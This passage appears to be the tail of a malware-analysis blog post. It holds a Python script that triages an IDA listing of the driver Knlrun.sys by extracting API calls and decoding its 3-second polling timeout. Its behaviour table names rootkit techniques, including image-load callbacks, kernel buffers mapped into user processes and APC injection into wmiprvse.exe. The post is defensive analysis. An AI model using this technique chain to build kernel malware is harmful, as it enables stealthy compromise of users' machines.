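SEG_RE = re.compile(r"\s+(?=(?:INIT|\.text|PAGE):[0-9A-Fa-f]{8}\b)")
# "call ds:X", "call X", or "call esi ; X" (IDA's comment names the register's target).
CALL_RE = re.compile(r"\bcall\s+(?:ds:|e[abcds][xip]\s*;\s*)?(\w+)")
TIMEOUT_RE = re.compile(r"Timeout\.(LowPart|HighPart)\],\s*([0-9A-Fa-f]+)h")

# Behaviours the post attributes to Knlrun.sys, keyed by the kernel APIs that
# implement them (the labels are the editor's, not the post's).
BEHAVIOURS = {
    "image-load callback (used to locate CreateProcessA)": {"PsSetLoadImageNotifyRoutine"},
    "kernel polling thread": {"PsCreateSystemThread", "KeWaitForSingleObject"},
    "kernel buffer mapped into a user process": {
        "IoAllocateMdl", "MmProbeAndLockPages", "MmMapLockedPagesSpecifyCache"},
    "user-mode APC injection (relaunches wmiprvse.exe)": {"KeInitializeApc", "KeInsertQueueApc"},
    "registry presence check for the plugin's keys": {"ZwOpenKey"},
}

def split_listing(flat):
    """Re-split a listing that was flattened onto one line: one instruction per item."""
    return [part for part in SEG_RE.split(flat.strip()) if part]

def extract_calls(lines):
    """Call targets in listing order (a bare register with no comment is returned as-is)."""
    return [m.group(1) for m in map(CALL_RE.search, lines) if m]

def classify(calls):
    """Map the observed calls to BEHAVIOURS: {label: sorted matching APIs}."""
    seen = set(calls)
    return {label: sorted(seen & apis) for label, apis in BEHAVIOURS.items() if seen & apis}

def relative_timeout_seconds(low, high):
    """Decode a KeWaitForSingleObject LARGE_INTEGER: negative = relative, 100 ns units."""
    value = (high << 32) | low
    if value >= 1 << 63:          # interpret the 64-bit pattern as signed
        value -= 1 << 64
    if value >= 0:
        raise ValueError("absolute (positive) timeout, not a relative one")
    return -value / 10_000_000

def poll_interval(lines):
    """Find StartRoutine's Timeout.LowPart/HighPart stores and decode them, else None."""
    parts = {m.group(1): int(m.group(2), 16) for m in map(TIMEOUT_RE.search, lines) if m}
    if "LowPart" in parts and "HighPart" in parts:
        return relative_timeout_seconds(parts["LowPart"], parts["HighPart"])
    return None

def triage(flat):
    """One pass over a flattened listing: calls, behaviours, and the polling interval."""
    lines = split_listing(flat)
    calls = extract_calls(lines)
    return {"calls": calls, "behaviours": classify(calls), "poll_seconds": poll_interval(lines)}
```

Running `triage(SAMPLE)` reports the 3-second polling interval and all five behaviours except the MDL allocation itself, which the sample omits.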
PS: my abilities are limited; if the analysis is off anywhere, experts please point it out, and go easy on the bricks.
Author: Zhu Jian (zhujian198)
Currently working at the China R&D center of Comodo Inc. (USA)